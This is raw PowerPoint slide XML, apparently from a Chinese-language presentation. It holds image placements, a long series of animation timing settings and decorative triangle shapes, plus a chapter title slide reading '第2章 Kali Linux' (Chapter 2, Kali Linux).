            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="1040130"/>
            <a:ext cx="568325" cy="568325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="图片 28" descr="购物篮"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId42">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId43"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3317240" y="1901190"/>
            <a:ext cx="574675" cy="574675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>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1" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="18" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2049"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="19" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="22" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2549"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="23" presetID="41" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="30" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3299"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="31" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="34" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3799"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="35" presetID="16" presetClass="entr" presetSubtype="21" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="38" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4299"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="39" presetID="41" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="46" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="5050"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="47" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="50" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="5550"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="51" presetID="41" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="56" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="58" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="7600"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="59" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105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21" grpId="1"/>
      <p:bldP spid="3" grpId="0"/>
      <p:bldP spid="3" grpId="1"/>
      <p:bldP spid="10" grpId="0"/>
      <p:bldP spid="10" grpId="1"/>
      <p:bldP spid="11" grpId="0"/>
      <p:bldP spid="11" grpId="1"/>
    </p:bldLst>
  </p:timing>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等腰三角形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-354902" y="1593655"/>
            <a:ext cx="2812747" cy="2101740"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3859264" y="2678072"/>
            <a:ext cx="5245100" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>章</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>Kali Linux</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="等腰三角形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="10384747" y="2655849"/>
            <a:ext cx="2069408" cy="1546303"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="等腰三角形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-436508" y="2327919"/>
            <a:ext cx="3458403" cy="2584187"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
